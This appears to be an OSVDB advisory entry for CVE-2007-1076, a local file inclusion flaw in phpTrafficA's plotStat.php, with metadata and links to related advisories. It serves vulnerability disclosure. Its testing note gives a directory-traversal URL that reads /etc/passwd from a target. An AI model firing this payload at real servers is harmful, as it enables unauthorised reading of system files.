phpTrafficA plotStat.php file Variable Traversal Local File Inclusion

2007-02-21T05:03:48
ID OSVDB:33373
Type osvdb
Reporter OSVDB
Modified 2007-02-21T05:03:48

Description

Manual Testing Notes

http://[target]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd

References:

Secunia Advisory ID:24242 Related OSVDB ID: 33374 Other Advisory URL: http://www.bugtraq.ir/articles/file-inclusion/phpTrafficA-1.4.1-Local-File-Inclusion/1 Mail List Post: http://attrition.org/pipermail/vim/2007-February/001377.html ISS X-Force ID: 32628 FrSIRT Advisory: ADV-2007-0709 CVE-2007-1076 Bugtraq ID: 22655